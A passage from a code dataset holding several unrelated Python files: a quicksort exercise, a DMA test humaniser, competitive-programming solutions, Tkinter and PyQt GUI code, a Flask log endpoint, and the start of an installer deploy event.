self.video.write(frame)\n","repo_name":"bohmax/tirocinio","sub_path":"Sviluppo/0prove/Stream_out.py","file_name":"Stream_out.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38652260785","text":"import unittest\nimport random\nimport sys\nimport math\nimport operator\n\ndebug = False\ncompareCount = 0\n\n# Performs quicksort on a global array (in place)\ndef quicksort(l,r,pivotType='rand'):\n\n global arr\n global compareCount \n global debug \n \n length = r-l+1\n if (length <= 1): return\n\n # add to comparecount\n compareCount += length - 1\n \n pivot = choosePivot(l,r,pivotType)\n pivotVal = arr[pivot]\n [left,right] = partition(l,r,pivot)\n \n lengthLeft = left[1]-left[0]+1\n lengthRight = right[1]-right[0]+1\n\n if (lengthLeft > 0):\n quicksort(left[0],left[1],pivotType)\n \n if (lengthRight > 0):\n quicksort(right[0],right[1],pivotType)\n\n return arr\n\ndef partition(l,r,p):\n \n global arr\n \n # Swap pivot to first position\n pivotVal = swapPivot(l,p)\n\n i = l+1\n for j in range(l+1,r+1):\n if (arr[j] < pivotVal):\n # Swap first element known to be larger with the current\n current = arr[j]\n firstLarge = arr[i]\n arr[i] = current\n arr[j] = firstLarge\n # Increment divider between smaller and larger sections\n i += 1\n\n # Swap pivot into correct place\n lastSmall = arr[i-1]\n arr[i-1] = pivotVal\n arr[l] = lastSmall\n\n # Build arrays with pointers\n left = [l,i-2]\n right = [i,r]\n return [left,right]\n\n# Swap pivot element with first of array section\ndef swapPivot(l,p):\n global arr\n pivotVal = arr[p]\n firstVal = arr[l]\n arr[l] = pivotVal\n arr[p] = firstVal\n return pivotVal\n\n# Choose the pivot based on the type\ndef choosePivot(l,r, pivotType='first'):\n global arr\n global debug\n if (pivotType == 'first'):\n return l\n elif (pivotType == 'last'):\n return r\n elif (pivotType == 'med3'):\n middle = l + math.floor((r-l)/2)\n three = [(l,arr[l]),(middle,arr[middle]),(r,arr[r])]\n three.sort(key = operator.itemgetter(1))\n return three[1][0]\n else:\n return random.randrange(l,r+1)\n\n#========= Test Cases =========#\n\n### Actual Assignment input\ntext_file = open(\"./ex3input.txt\", \"r\")\narr = text_file.read().splitlines()\nfor i in range(len(arr)):\n arr[i] = int(arr[i])\nsys.setrecursionlimit(max(sys.getrecursionlimit(), len(arr)+10000))\nsortedArr = quicksort(0,len(arr)-1,'med3')\nprint(sortedArr)\nprint('compareCount '+str(compareCount))\n### first comparecount 162085\n### last comparecount 164123\n### med3 comparecount 138382\n\n\n### large test case\n# text_file = open(\"./ex3testcases/input_dgrcode_16_100000.txt\", \"r\")\n# arr = text_file.read().splitlines()\n# for i in range(len(arr)):\n# arr[i] = int(arr[i])\n# sys.setrecursionlimit(max(sys.getrecursionlimit(), len(arr)+10000))\n# sortedArr = quicksort(0,len(arr)-1,'med3')\n# print(sortedArr)\n# print('compareCount '+str(compareCount))\n### first should be 2127173 => 2127173\n### last should be 2079088 => 2079088\n### med3 should be 1749103 => 1749103\n\n### small test case\n# text_file = open(\"./ex3testcases/input_dgrcode_15_20.txt\", \"r\")\n# arr = text_file.read().splitlines()\n# for i in range(len(arr)):\n# arr[i] = int(arr[i])\n# sys.setrecursionlimit(max(sys.getrecursionlimit(), len(arr)+10000))\n# sortedArr = quicksort(0,len(arr)-1,'med3')\n# print(sortedArr)\n# print('compareCount '+str(compareCount))\n### first should be 69 => 69\n### last should be 65 => 65\n### med3 should be 56 => 56\n\n\n### small test case\n# text_file = open(\"./ex3testcases/input_dgrcode_10_10.txt\", \"r\")\n# arr = text_file.read().splitlines()\n# for i in range(len(arr)):\n# arr[i] = int(arr[i])\n# sys.setrecursionlimit(max(sys.getrecursionlimit(), len(arr)+10000))\n# sortedArr = quicksort(0,len(arr)-1,'med3')\n# print(sortedArr)\n# print('compareCount '+str(compareCount))\n### first should be 21 => 21\n### last should be 22 => 22\n### med3 should be 20 => 20\n\n# class TestQuicksort(unittest.TestCase):\n# def test(self):\n# self.assertEqual(quicksort([4,5,9,4,10,6,5,3,7,8,3,7,1,2,5,7,3,2,1],False,False,'first'),[1,1,2,2,3,3,3,4,4,5,5,5,6,7,7,7,8,9,10])\n# theTest = TestQuicksort()\n# theTest.test()\n\n\n\n","repo_name":"jqlee85/algorithms","sub_path":"src/coursera/divide-and-conquer/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26436664126","text":"import sys\nimport re\n\ndef humanise_asserts(line):\n prologue = '\\tassert(1 && '\n epilogue = ' );\\n'\n assert line.startswith(prologue)\n assert line.endswith(epilogue)\n line = line[len(prologue):-len(epilogue)]\n asserts = line.split(' && ')\n return ['\\tassert({0});\\n'.format(a) for a in asserts]\n\ndef arithmetic_target(value):\n return 'AT_{0}'.format(\n 'BOTH' if value == 0 else (\n 'SOURCE_ONLY' if value == 1 else (\n 'DEST_ONLY' if value == 2 else (\n 'ERROR'))))\n\ndef int_to_macro(instruction):\n opcode = instruction >> 28\n reg = (instruction >> 26) & 3\n value = instruction & 0x3FFFFFF\n if opcode == 0:\n return 'DMA_OP_SET(LOOP_REG_{0}, {1})'.format(reg, value)\n elif opcode == 1:\n return 'DMA_OP_LOOP(LOOP_REG_{0}, {1})'.format(reg, value)\n elif opcode == 2:\n transfer_size = 8 * (1 << ((instruction >> 25) & 0x7))\n return 'DMA_OP_TRANSFER(TS_BITS_{0})'.format(transfer_size)\n elif opcode == 4:\n return 'DMA_OP_ADD({0}, {1})'.format(arithmetic_target(reg), value)\n elif opcode == 5:\n return 'DMA_OP_SUB({0}, {1})'.format(arithmetic_target(reg), value)\n elif opcode == 6:\n return 'DMA_OP_STOP'\n else:\n assert False\n\ndef match_to_macro(match):\n return int_to_macro(int(match.group(0), 16))\n\ndef humanise_programs(line):\n line = line.replace('{', '{\\n').replace('}', '\\n}').replace(',', ',\\n\\t')\n line = re.sub('0x[0-9a-f]{8}', match_to_macro, line)\n return line\n\ndef main():\n new_file = []\n with open(sys.argv[1]) as test_file:\n for line in test_file:\n def first_is(match):\n return line.strip().startswith(match)\n\n if first_is('assert(1 &&'):\n new_file.extend(humanise_asserts(line))\n elif (first_is('*((volatile uint8_t *)') or\n first_is('add_tlb_mapping')):\n new_file.append(line.replace(';', ';\\n\\t'))\n elif line.strip().startswith('dma_instruction *dma_program[]'):\n new_file.append(humanise_programs(line))\n else:\n new_file.append(line)\n\n with open(sys.argv[1], 'w') as test_file:\n test_file.write(''.join(new_file))\n\nif __name__ == '__main__':\n main()\n","repo_name":"CTSRD-CHERI/beri","sub_path":"cheritest/trunk/fuzz_dma/humanise_test.py","file_name":"humanise_test.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"} +{"seq_id":"10844826774","text":"import sys\nn, m, b = map(int, sys.stdin.readline().rstrip().split())\ndata = [list(map(int, sys.stdin.readline().rstrip().split())) for _ in range(n)]\na = []\nresult = []\nfor i in data: a += i\nfor i in range(min(a), max(a) + 1):\n sec = 0\n b_save = b\n for j in data:\n for k in j:\n if i > k:\n sec += i - k\n b_save -= i - k\n elif i < k:\n sec += (k - i) * 2\n b_save += k - i\n if b_save >= 0:\n result.append((sec, i))\nresult = sorted(result, key=lambda a:a[0])\nnow = result[0]\nfor i in range(1, len(result)):\n if now[0] != result[i][0]:\n break\n if now[1] < result[i][1]:\n now = result[i]\nprint(' '.join([str(i) for i in now]))","repo_name":"K1A2/algorithm_python","sub_path":"baekjoon/brutedorce/18111_마인크래프트.py","file_name":"18111_마인크래프트.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38082029202","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 10 00:30:18 2019\n\n@author: sagara.co@nsit.net.in, rajat.usict.101164@ipu.ac.in\n\"\"\"\n\nimport Tkinter as tk\nimport random\nimport pickle\nimport os\nimport pandas as pd\nimport tkMessageBox as messagebox\n\nusername = \"xxx\"\nuserpart = 1\nidx = 0\nlines = 0\nflag = 0\nidxfileloc = '0'\nmax_entries = 0\nunprocessed_idxs = 0\nbucket = \"\"\nunprocessed_idx = 0\nrandarr = 0\n\n# get default path\npath = os.path.dirname(os.path.abspath(__file__))\nfileHandle = open(path + '/test.txt', 'w')\n\n# get dictionary from pickle file\npickle_file = open(path + '/data/dict.pickle','rb')\nword_dict = pickle.load(pickle_file)\n\n# windpw close message \ndef on_closing():\n\tif messagebox.askokcancel(\"Quit\", \"Do you want to quit?\"):\n\t\tfileHandle.close()\n\t\topenfile = open(idxfileloc,'w')\n\t\topenfile.write(str(max(idx,0)))\n\n\t\tdbfile = open(path + '/files/' + username + 'unprocessed.pickle','w+')\n\t\tpickle.dump(unprocessed_idxs, dbfile)\n\t\tdbfile.close()\n\n\t\tmain_window.destroy()\n\ndef on_complete():\n\tif messagebox.askokcancel(\"Annotations complete\", \"Annotations complete, Do you want to quit?\"):\n\t\tfileHandle.close()\n\t\topenfile = open(idxfileloc,'w')\n\t\topenfile.write(str(max(idx,0)))\n\t\tmain_window.destroy()\n\ndef fill_all():\n\tmessagebox.showinfo(\"Choose right\", \"You can't choose none of these, choose viable option.\")\n\treturn\n\t\t\n \ndef meaningPressCallBack(wordMeaning):\n\tr = tk.Tk()\n\tr.withdraw()\n\tr.clipboard_clear()\n\tr.clipboard_append(wordMeaning.split('-')[0])\n\tr.update() # now it stays on the clipboard after the window is closed\n\n\ndef update():\n\tglobal idx\n\tglobal lines\n\tglobal max_entries\n\tglobal bucket\n\tglobal unprocessed_idxs\n\tglobal unprocessed_idx\n\tglobal randarr\n\n\n\tif (idx>=max_entries-1 and len(unprocessed_idxs)==0 and var1.get()!=5 and var2.get()!=5):\n\t\tfileHandle.write(str(idx) + ',' + str(randarr[var1.get()-1]) + ',' + str(randarr[var2.get()-1]) + '\\n')\n\t\ton_complete()\n\t\treturn \n\t\n\tif(flag==1):\n\t\t# add in list\n\t\tif (var1.get()==5 or var2.get()==5):\n\n\t\t\tif (bucket==\"unprocessed\"):\n\t\t\t\t# show pop-up\n\t\t\t\tfill_all()\n\t\t\t\treturn\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tunprocessed_idxs.append(idx)\n\t\t\t\tfileHandle.write(str(idx) + ',' + str(randarr[var1.get()-1]) + ',' + str(randarr[var2.get()-1]) + '\\n')\n\n\t\telif (bucket=='unprocessed'):\n\t\t\tfileHandle.write(str(idx) + ',' + str(randarr[var1.get()-1]) + ',' + str(randarr[var2.get()-1]) + '\\n')\n\t\t\tunprocessed_idxs.remove(unprocessed_idx)\n\n\n\t\telse:\n\t\t\tfileHandle.write(str(idx) + ',' + str(randarr[var1.get()-1]) + ',' + str(randarr[var2.get()-1]) + '\\n')\t\t\n\n\t\t# choose index\n\t\tunprocessed_size = len(unprocessed_idxs)\n\t\tremanining_size = max_entries-1-idx\n\t\tif (remanining_size+unprocessed_size==0):\n\t\t\ton_complete()\n\t\trandom_idx = random.randint(1,remanining_size+unprocessed_size)\n\n\t\tif random_idx > remanining_size:\n\t\t\tbucket = 'unprocessed'\n\t\t\tunprocessed_idx = unprocessed_idxs[random_idx - remanining_size - 1]\n\t\telse:\n\t\t\tbucket = 'remanining'\n\t\t\tidx+=1\n\n\tword = [0 for x in range(4)]\n\n\tif (bucket == 'unprocessed'):\n\t\tword[0] = lines.iloc[unprocessed_idx][0]\n\t\tword[1] = lines.iloc[unprocessed_idx][1]\n\t\tword[2] = lines.iloc[unprocessed_idx][2]\n\t\tword[3] = lines.iloc[unprocessed_idx][3]\n\n\telse :\n\t\tword[0] = lines.iloc[idx][0]\n\t\tword[1] = lines.iloc[idx][1]\n\t\tword[2] = lines.iloc[idx][2]\n\t\tword[3] = lines.iloc[idx][3]\n\n\trandarr = random.sample(range(0,4),4)\n\n\tsep = '#'\n\tshow1 = word[randarr[0]].split(sep, 1)[0]\n\tshow2 = word[randarr[1]].split(sep, 1)[0]\n\tshow3 = word[randarr[2]].split(sep, 1)[0]\n\tshow4 = word[randarr[3]].split(sep, 1)[0]\n\n\tmng1 = word_dict[word[randarr[0]]]\n\tmng2 = word_dict[word[randarr[1]]]\n\tmng3 = word_dict[word[randarr[2]]]\n\tmng4 = word_dict[word[randarr[3]]]\n\n\n\tw11.config(text=show1)\n\tw12.config(text=show2)\n\tw13.config(text=show3)\n\tw14.config(text=show4)\n\t\n\tw21.config(text=show1)\n\tw22.config(text=show2)\n\tw23.config(text=show3)\n\tw24.config(text=show4)\n\t\n\tw15.config(text='none of the above')\n\tw25.config(text='none of the above')\n\t\n\tmeaning1.config(text = show1 + '- ' + mng1)\n\tmeaning2.config(text = show2 + '- ' + mng2)\n\tmeaning3.config(text = show3 + '- ' + mng3)\n\tmeaning4.config(text = show4 + '- ' + mng4)\n\n\ndef raise_frame(frame):\n\n\tglobal username\n\tglobal userpart\n\tglobal idx\n\tglobal lines\n\tglobal fileHandle\n\tglobal flag\n\tglobal idxfileloc \n\tglobal max_entries\n\tglobal unprocessed_idxs\n\t\n\t# get username and lowercase it and remove leading spaces\n\tusername = Name.get().lower().lstrip()\n\t\n\t# get selected part \n\tuserpart = var_.get()\n\tlines = pd.read_csv(path + '/data/' + 'part' + str(userpart) + '.csv', 'r', encoding = 'utf-8-sig', header = None, delimiter = '\\t')\n\tstatements = lines[1:]\n\tmax_entries = lines.shape[0]\n\n\tfileloc = path + '/files/' + username + '.txt'\n\t\n\tif (os.path.exists(fileloc) == False):\n\t\tfileHandle = open(fileloc, 'w')\n\t\tfileHandle.close()\n\t\tfileHandle = open(fileloc, 'a')\n\telse :\n\t\tfileHandle = open(fileloc, 'a')\n\t\n\t\n\t# get idx from idx file\n\tidxfileloc = path + '/files/' + username + 'idx.txt'\n\t\n\tif (os.path.exists(idxfileloc)):\n\t\tidxfile = open(idxfileloc)\n\t\tidxline = idxfile.readlines()\n\t\tidxfile.close()\n\t\tidx = int(idxline[0])\n\telse :\n\t\tidxfile = open(idxfileloc, 'w')\n\t\tidxfile.close()\n\t\tidx = 0\n\t\n\t# get unprocessed indexes data from pickle file if present\n\n\tunprocessed_idx_file = path + '/files/' + username + 'unprocessed.pickle'\n\n\tif (os.path.exists(unprocessed_idx_file)):\n\t\tunprocessed_idx_file_pickle = open(unprocessed_idx_file,'rb')\n\t\tunprocessed_idxs = pickle.load(unprocessed_idx_file_pickle)\n\telse :\n\t\tunprocessed_idx_file_pickle = open(unprocessed_idx_file,\"wb\")\n\t\tunprocessed_idxs = []\n\n\n\n\tupdate()\n\tflag = 1\n\n\tregister_frame.destroy()\n\tmain_frame.pack()\n\tframe.tkraise()\n\t\n\n\n# main window\nmain_window = tk.Tk()\nmain_window.geometry('1080x920')\n\n# frames\nregister_frame = tk.Frame(main_window)\nmain_frame = tk.Frame(main_window)\nregister_frame.pack()\n\t\n# place label\ninfo = tk.Label(register_frame, font=(\"Courier\", 15), text = 'Write your name, \\n choose your section and then press OK')\ninfo.grid(row = 0, column = 0)\ninfo.grid_propagate(0)\n\n# place name\nvar = tk.StringVar()\nName = tk.Entry(register_frame, textvariable = var, width=20)\nName.grid(row = 0, column = 1)\n\n# choose option\nvar_ = tk.IntVar()\nop1 = tk.Radiobutton(register_frame, text='Part 1', bg = 'ivory2', value = 1, variable = var_).grid(row = 1, column = 2)\nop2 = tk.Radiobutton(register_frame, text='Part 2', bg = 'ivory2', value = 2, variable = var_).grid(row = 1, column = 3)\nop3 = tk.Radiobutton(register_frame, text='Part 3', bg = 'ivory2', value = 3, variable = var_).grid(row = 1, column = 4)\nop4 = tk.Radiobutton(register_frame, text='Part 4', bg = 'ivory2', value = 4, variable = var_).grid(row = 1, column = 5)\nop5 = tk.Radiobutton(register_frame, text='Test Part', bg = 'ivory2', value = 5, variable = var_).grid(row = 1, column = 6)\n\n#choose OK\nbutton = tk.Button(register_frame, height = 2, width = 4, text = 'OK', command = lambda: raise_frame(main_frame)).grid(row=4, column=1)\n\n\n# frames\nfrm0 = tk.Frame(main_frame, width = 480, height = 100, bd=0, bg='white')\nfrm0.grid(row = 0, column = 0, padx=(0,4), pady=(32,0))\n\nfrm01 = tk.Frame(main_frame, width = 480, height = 100, bd=0, bg='white')\nfrm01.grid(row = 0, column = 1, padx=(0,4), pady=(32,0))\n\nfrm1 = tk.Frame(main_frame, width =480, height= 180, bd=10, bg='ivory2')\nfrm1.grid(row = 1, column = 0, padx=(0,4), pady=(32,0))\nfrm1.grid_propagate(0)\n\nfrm2 = tk.Frame(main_frame, width =480, height= 180, bd=10, bg='ivory2')\nfrm2.grid(row = 1, column = 1,padx=(4,0), pady=(32,0))\nfrm2.grid_propagate(0)\n\nfrm7 = tk.Frame(main_frame, width =480, height= 180, bd=10, bg='ivory2')\nfrm7.grid(row = 2, column = 0, pady = (32,0))\nfrm7.grid_propagate(0)\n\nfrm8 = tk.Frame(main_frame, width =480, height= 180, bd=10, bg='white')\nfrm8.grid(row = 2, column = 1, pady=(32,0))\nfrm8.grid_propagate(0)\n\n# define labels\nlabel0 = tk.Label(frm0, font=(\"Helvetica\", 34), text = 'Please read the meanings first,')\nlabel0.place(x=10,y=10)\n\nlabel01 = tk.Label(frm01, font=(\"Helvetica\", 34), text = 'then choose.')\nlabel01.place(x=10,y=10)\n\nlabel1 = tk.Label(frm1, font=(\"Courier\", 16), text = 'Choose the most positive')\nlabel1.place(x=60,y=120)\n\nlabel2 = tk.Label(frm2, font=(\"Courier\", 16), text = 'Choose the least positive')\nlabel2.place(x=60,y=120)\n\nmeaning1 = tk.Button(frm7,font=(\"Courier\", 14), text = 'meaningoftest1',wraplength=450, justify=tk.LEFT,\n\tcommand=lambda: meaningPressCallBack(meaning1['text']))\nmeaning1.pack(anchor = tk.W)\n\nmeaning2 = tk.Button(frm7,font=(\"Courier\", 14), text = 'meaningoftest2',wraplength=450, justify=tk.LEFT,\n\tcommand=lambda: meaningPressCallBack(meaning2['text']))\nmeaning2.pack(anchor = tk.W)\n\nmeaning3 = tk.Button(frm7,font=(\"Courier\", 14), text = 'meaningoftest3',wraplength=450, justify=tk.LEFT,\n\tcommand=lambda: meaningPressCallBack(meaning3['text']))\nmeaning3.pack(anchor = tk.W)\n\nmeaning4 = tk.Button(frm7,font=(\"Courier\", 14), text = 'meaningoftest4',wraplength=450, justify=tk.LEFT,\n\tcommand=lambda: meaningPressCallBack(meaning4['text']))\nmeaning4.pack(anchor = tk.W)\n\n# set varibles\nvar1 = tk.IntVar()\nvar2 = tk.IntVar()\n\n# first radio button\nw11 = tk.Radiobutton(frm1, text='test1', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 1, variable = var1)\nw11.grid(row = 0, column = 0)\nw12 = tk.Radiobutton(frm1, text='test2', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 2, variable = var1)\nw12.grid(row = 0, column = 1)\nw13 = tk.Radiobutton(frm1, text='test3', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 3, variable = var1)\nw13.grid(row = 1, column = 0)\nw14 = tk.Radiobutton(frm1, text='test4', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 4, variable = var1)\nw14.grid(row = 1, column = 1)\nw15 = tk.Radiobutton(frm1, text='test5', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 5, variable = var1)\nw15.grid(row = 2, column = 0)\n\nw21 = tk.Radiobutton(frm2, text='test1', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 1, variable = var2)\nw21.grid(row = 0, column = 0)\nw22 = tk.Radiobutton(frm2, text='test2', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 2, variable = var2)\nw22.grid(row = 0, column = 1)\nw23 = tk.Radiobutton(frm2, text='test3', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 3, variable = var2)\nw23.grid(row = 1, column = 0)\nw24 = tk.Radiobutton(frm2, text='test4', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 4, variable = var2)\nw24.grid(row = 1, column = 1)\nw25 = tk.Radiobutton(frm2, text='test5', font=(\"Courier\", 14), bg = 'ivory2', padx = 20, pady = 5, value = 5, variable = var2)\nw25.grid(row = 2, column = 0)\n\n# next and exit buttons\nbutton = tk.Button(frm8, height = 2, width = 4, text = 'NEXT', padx=10, pady=10, command = update).pack(side = tk.LEFT)\nbutton = tk.Button(frm8, height = 2, width = 4, text = 'EXIT', padx=10, pady=10, command = on_closing).pack(side = tk.LEFT)\n\n\nmain_window.protocol(\"WM_DELETE_WINDOW\", on_closing)\nmain_window.resizable(width = True, height = True)\nmain_window.mainloop()\n\t\n\n","repo_name":"sagar-aggarwal/BWSAT","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10094319549","text":"'''\n请使用Python完成以下功能:\n一、随机DNA序列(共50分)\n(1)使用代码随机生成20000个样本的DNA序列(DNA是由AGCT四个碱基对随机组成的),\n生成文件名为dnaData.txt,文件的具体格式如下[25分]:\nnum00001\tAGCTC TAGTT CGGTA TAACT\nnum00002 TTAGA ……… TAGCT\nnum00003 ATAGA ………AAGAT\nnum00004 ATAGG ……… CACTT\n……………………………………………….\nnum20000 ATAGC ……… CTGAT\n评分标准:\n①样本编号必须连续,且从num00001到num20000(5分)\n②样本的DNA序列的长度必须为20(5分)\n③每5个序列间需要间隔1个空格,如num00001所示(5分)\n④每个位置的氨基酸(A、G、C、T)必须随机生成(5分)\n⑤按照格式将数据存入文件(5分)\n'''\n\ns1='ABCD'\n# import random\n# for i in range(1,501):\n# ss=''\n# for j in range(20):\n# ss+=random.choice(s1)\n# print('S'+str(i).zfill(5)+'\\t'+ss+'\\n')\n\n#print(s1.partition('C')) #按指定分隔符分割,返回 左边字串,分隔符,右边字串 的三部分的元组\n\n#print('1'.rjust(3,'0')) #返回指定长度的字符串 ,并右对齐,默认前面用空格填充,也可以指定字符\n\n#print('1'.zfill(3)) #返回指定长度的字符串 ,并右对齐,前面用 “0” 填充\n\n\n\n#循环字典来进行比较相同的数量\ndict1 = {'S00001\\tCCDBCBACACADACCBADBA': 0, 'S00002\\tAAACBCDCCDCCDDCBDADD': 0, 'S00003\\tCADADBDCDCDDDBBCABDD': 0, 'S00004\\tCBBBABAABCCBBBDDCAAA': 0, 'S00005\\tAAADDDDCBADDBBBBDADA': 0}\ns2 = 'S00002\\tAAACBCDCCDCCDDCBDADD'\nfor i in dict1.keys():\n count1=0 #计数\n for j in range(20):\n #判断比较\n print(i)\n print('i[-20:][%d]'%j,i[-20:][j])\n print('s2[-20:][%d]'%j,s2[-20:][j])\n '''\n 核心代码,先进行截取操作,截取倒数第20个至末尾,此时结果是列表;\n 然后通过下标获取该列表的对应元素,\n 例如:i= \"S00001 \tCCDBCBACACADACCBADBA\" i[-20:][0] = 'C'\n '''\n if i[-20:][j]==s2[-20:][j]:\n count1+=1\n dict1[i]=count1\nprint(dict1)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jiangshangliu/pyPractice","sub_path":"for_month_exam_practice/testA.py","file_name":"testA.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24278654661","text":"import sys, os\nsys.path.append(os.getcwd())\n\nfrom hslog.liveparser import LiveLogParser\nfrom flask import Flask, request\n\nliveParser = LiveLogParser(None)\n\napp = Flask(__name__)\n\n\n@app.route(\"/\", methods=['POST'])\ndef hello():\n req_data = request.get_json()\n\n # feed the parser\n liveParser.flask_endpoint(req_data['line'].strip())\n return ''\n\nif __name__ == '__main__':\n app.run(debug=True, port=5000)","repo_name":"dduric/hearthstone-experiments","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16769734689","text":"import sys\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import *\n\nclass Window(QWidget):\n def __init__(self):\n super().__init__()\n\n # ser my layout\n grid = QGridLayout()\n self.setLayout(grid)\n self.setGeometry(10, 10, 300, 300) # top left x, top left y, width, height\n\n # make our widgets\n label1 = QLabel(\"label1\", self) # text to display, widget to display to\n grid.addWidget(label1, 1, 1, 1, 1) # row, col, row_span, col_span\n\n button1 = QPushButton(\"button1\", self)\n grid.addWidget(button1, 1, 2, 1, 1)\n\n lcd = QLCDNumber(self)\n lcd.display(50)\n grid.addWidget(lcd, 2, 1, 1, 2)\n\n slider = QSlider(Qt.Horizontal, self)\n slider.setValue(50)\n grid.addWidget(slider, 3, 1, 1, 2)\n\n combobox = QComboBox(self)\n grid.addWidget(combobox, 4, 1, 1, 1)\n combobox.addItems([\"Beck\", \"Nathan\", \"Olivia\"])\n\n checkbox = QCheckBox(self)\n grid.addWidget(checkbox, 4, 2, 1, 1)\n\n textline = QLineEdit(self)\n grid.addWidget(textline, 5, 1, 1, 1)\n\n multiline = QTextEdit(self)\n grid.addWidget(multiline, 5, 2, 1, 1)\n\n calender = QCalendarWidget(self)\n grid.addWidget(calender, 6, 1, 1, 1)\n\n # set up signals and slots\n button1.clicked.connect(lambda: label1.setText(\"Clicked!\"))\n slider.valueChanged.connect(lcd.display)\n checkbox.stateChanged.connect(self.box_checked)\n multiline.textChanged.connect(lambda: print(\"Changed\"))\n combobox.currentTextChanged.connect(lambda: print(combobox.currentText()))\n\n def box_checked(self):\n print(\"Box checked!\")\n\n # draw the app\n self.show()\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n gui = Window() # create an instance of the window class\n sys.exit(app.exec_())","repo_name":"sturner18/ProgrammingNotes","sub_path":"pyqtnotes.py","file_name":"pyqtnotes.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1659367246","text":"import sys\n\ninput = sys.stdin.readline\n\nN, M, L = map(int, input().split())\nif N > 0:\n rest_area = list(map(int, input().split()))\n rest_area.append(0)\n rest_area.append(L)\n rest_area.sort()\n\n\n# N이 0이면 휴게소 입력 받을 수 없음.\n\n\ndef check_additional_rest_area_cnt(mid):\n \"\"\"\n 휴게소 간격을 최대 mid로 한다고 했을 때, 더 설치해야 하는 휴게소 개수\n \"\"\"\n\n # 만약에 현재 휴게소 0개 라면 따로 처리\n if N == 0:\n tmp = L // mid\n if L % mid == 0:\n return (tmp - 1)\n return tmp\n\n cnt = 0\n before_rest_area_idx = rest_area[0]\n for i in range(1, N + 2):\n tmp = rest_area[i] - before_rest_area_idx\n if tmp > mid:\n add_cnt = (tmp // mid) # 중간에 더 설치해야 하는 휴게소 개수\n if before_rest_area_idx + (mid * add_cnt) == rest_area[i]: # 이미 설치된 곳에 또 설치하진 않아도 됨\n add_cnt -= 1\n cnt += add_cnt # 그만큼 더하기\n before_rest_area_idx = rest_area[i]\n\n return cnt\n\n\nleft = 0\nright = L\nmid = (left + right) // 2\nans = 1001\n\nwhile left <= right:\n mid = (left + right) // 2 # 휴게소가 없는 구간의 최댓값의 최솟값\n if left == 0 and right == 1: # N이 0일 때를 위해서 특별 처리..\n mid = 1\n if mid <= 0:\n break\n tmp_cnt = check_additional_rest_area_cnt(mid)\n\n if tmp_cnt > M: # 휴게소를 계획보다 더 설치해야 하면\n left = mid + 1 # 휴게소가 없는 구간의 최댓값의 최솟값 넓히기\n\n else: # 휴게소를 계획만큼 or 휴게소를 계획보다 덜 설치해야 하면\n right = mid - 1 # 휴게소가 없는 구간의 최댓값의 최솟값 줄이기\n ans = min(ans, mid) # 정답될 수 있음\n\nprint(ans)\n","repo_name":"mintropy/algorithm_pulzo","sub_path":"김서인/2201/0131/1477.py","file_name":"1477.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"9597317926","text":"from deploy.util import FormattedFile as ffile\nfrom deploy.util import img\nfrom deploy.util import repo\nfrom deploy.util import versort\n\nfrom deploy.errors import assert_file_has_content\nfrom deploy.event import Event\nfrom deploy.dlogging import L1\n\ndef get_module_info(ptr, *args, **kwargs):\n return dict(\n api = 5.0,\n events = ['BaseInfoEvent'],\n description = 'reads the .buildstamp file from the base distribution',\n )\n\nclass BaseInfoEvent(Event):\n def __init__(self, ptr, *args, **kwargs):\n Event.__init__(self,\n id = 'base-info',\n parentid = 'installer',\n ptr = ptr,\n requires = ['anaconda-version', 'installer-repo'],\n provides = ['base-info'],\n )\n\n self.DATA = {\n 'input': set(),\n 'output': set(),\n 'variables': set(['cvars[\\'anaconda-version\\']']),\n }\n\n def error(self, e):\n Event.error(self, e)\n try:\n self.image.close()\n except:\n pass\n\n def setup(self):\n self.diff.setup(self.DATA)\n\n initrd_in=( self.cvars['installer-repo'].url /\n self.locals.L_FILES['pxeboot']['initrd.img']['path'] )\n\n self.io.add_fpath(initrd_in, self.mddir, id='initrd.img')\n self.initrd_out = self.io.list_output(what='initrd.img')[0]\n self.buildstamp_out = self.mddir/'.buildstamp'\n self.DATA['output'].add(self.buildstamp_out)\n\n def run(self):\n self.log(2, L1(\"reading buildstamp file from base repository\"))\n\n # download initrd.img\n self.io.process_files(cache=True, callback=self.link_callback,\n text=None, what='initrd.img')\n\n # extract buildstamp\n image = self.locals.L_FILES['pxeboot']['initrd.img']\n self.image = 